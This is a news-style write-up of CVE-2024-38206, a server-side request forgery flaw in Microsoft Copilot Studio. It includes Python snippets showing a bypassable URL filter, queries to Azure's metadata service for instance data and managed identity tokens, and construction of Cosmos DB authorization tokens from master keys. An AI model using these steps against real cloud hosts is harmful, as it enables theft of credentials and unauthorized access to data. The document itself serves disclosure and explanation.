Microsoft recently patched a critical vulnerability in its Copilot Studio tool, tracked as CVE-2024-38206. The flaw, discovered by the cybersecurity firm Tenable, is a server-side request forgery (SSRF) issue that allowed researchers to access sensitive internal cloud data and services.
Copilot Studio and its HTTP Request Feature
Copilot Studio, built on Microsoft’s Power Platform, empowers users to create custom AI chatbots capable of handling various tasks using data sourced from Microsoft 365 and other linked platforms. Notably, one of its features is the ability to initiate HTTP requests in response to specific user phrases.
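Any service-side HTTP fetch of a user-influenced URL is a potential SSRF vector, which is what made this feature worth probing. The Python sketch below is a generic illustration of the pattern, not Copilot Studio's actual implementation: the naive check inspects only the original URL, so a redirect from an allowed host to an internal address slips through, because `urlopen` follows redirects without re-checking.

```python
import ipaddress
import socket
import urllib.parse
import urllib.request

def fetch(url: str) -> bytes:
    """Fetch a user-supplied URL after a naive internal-address check."""
    host = urllib.parse.urlparse(url).hostname
    if host is None:
        raise ValueError("URL has no host")
    addr = ipaddress.ip_address(socket.gethostbyname(host))
    # Block obvious internal targets such as the link-local metadata address.
    # Checks like this are bypassable: urlopen() follows redirects, and this
    # check is never re-applied to the redirect target.
    if addr.is_private or addr.is_link_local or addr.is_loopback:
        raise ValueError(f"blocked internal address: {addr}")
    return urllib.request.urlopen(url, timeout=5).read()
```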
Exploiting the Flaw: Access to Internal Infrastructure
Tenable's researchers combined this HTTP request functionality with a bypass of the tool's SSRF protections to reach Microsoft's internal infrastructure supporting Copilot Studio, including the Instance Metadata Service (IMDS) and internal Cosmos DB databases.
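The payoff of reaching the IMDS is straightforward to illustrate. The sketch below is an ordinary Azure IMDS query; the link-local 169.254.169.254 endpoint and the `Metadata: true` header are documented Azure behavior, and in the actual exploit an equivalent request would have been issued through the bypassed HTTP request action rather than run directly.

```python
import json
import urllib.request

# Documented Azure IMDS endpoint; it is reachable only from inside the
# instance, which is exactly the position a successful SSRF provides.
IMDS_URL = "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

req = urllib.request.Request(IMDS_URL, headers={"Metadata": "true"})
with urllib.request.urlopen(req, timeout=2) as resp:
    metadata = json.load(resp)

# The response includes compute details (region, subscription, VM names)
# that help an attacker map the internal environment.
print(json.dumps(metadata, indent=2))
```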
Consequences: Retrieval of Sensitive Data
With that access, the researchers retrieved instance metadata, including managed identity access tokens, directly in Copilot chat responses. These tokens could have been misused to gain unauthorized access to other internal Microsoft cloud resources.
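Azure's IMDS also exposes a documented token endpoint for the host's managed identity, which is the likely shape of the request involved here. The resource URI below is an illustrative assumption, since it is not specified which resources the leaked tokens were scoped to.

```python
import json
import urllib.request

# Documented IMDS endpoint for requesting a managed identity access token.
# The resource URI (Azure Resource Manager) is an illustrative assumption.
TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

req = urllib.request.Request(TOKEN_URL, headers={"Metadata": "true"})
with urllib.request.urlopen(req, timeout=2) as resp:
    token = json.load(resp)["access_token"]

# The bearer token authenticates as the host's managed identity, which is
# why surfacing it in chat output is so severe.
print(token[:40], "...")
```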
Demonstrating the Impact: Access to a Cosmos DB Instance
To demonstrate the impact, the researchers gained read/write access to an internal Cosmos DB instance: master keys obtained through the IMDS were used to generate valid authorization tokens for the database.
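Cosmos DB's master-key authorization scheme is publicly documented: an HMAC-SHA256 signature over the HTTP verb, resource type, resource link, and request date, keyed with the base64-decoded master key. The sketch below follows that documented scheme; the database and collection names (and the key itself) are hypothetical.

```python
import base64
import hashlib
import hmac
import urllib.parse
from email.utils import formatdate

def cosmos_master_token(verb: str, resource_type: str, resource_link: str,
                        date: str, master_key: str) -> str:
    """Build a Cosmos DB master-key authorization token per the documented scheme."""
    key = base64.b64decode(master_key)
    # Signed payload: lowercase verb and resource type, the resource link
    # verbatim, the lowercase RFC 1123 date, and a trailing blank line.
    payload = (f"{verb.lower()}\n{resource_type.lower()}\n"
               f"{resource_link}\n{date.lower()}\n\n")
    sig = base64.b64encode(
        hmac.new(key, payload.encode("utf-8"), hashlib.sha256).digest()
    ).decode()
    return urllib.parse.quote(f"type=master&ver=1.0&sig={sig}", safe="")

# Hypothetical example: a token for listing documents in a collection. The
# same date string must also be sent in the request's x-ms-date header.
date = formatdate(usegmt=True)
key = base64.b64encode(b"a-leaked-master-key").decode()  # placeholder key
token = cosmos_master_token("GET", "docs", "dbs/exampledb/colls/examplecoll",
                            date, key)
```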
Cross-Tenant Concerns and Swift Mitigation
Although Tenable's investigation did not uncover any immediately accessible cross-tenant data, the researchers noted that the Copilot Studio infrastructure is shared among customers, so any compromise of the underlying systems could have cascading effects on multiple Copilot Studio tenants.
Microsoft acted promptly upon being alerted to the vulnerability and has effectively addressed it. The company classified the flaw as a critical information disclosure vulnerability and assigned it the identifier CVE-2024-38206. According to Microsoft, no action is required on the part of customers as the vulnerability has been fully mitigated.
The discovery of this SSRF vulnerability within Copilot Studio underscores the inherent risks associated with AI-powered cloud services capable of making external HTTP requests. As these tools grow in sophistication and integration with sensitive enterprise data, robust security measures and consistent auditing become even more vital for preventing unauthorized access and potential data breaches.
While Microsoft has successfully addressed this particular vulnerability, the escalating complexity of generative AI systems necessitates ongoing vigilance from both service providers and their customers.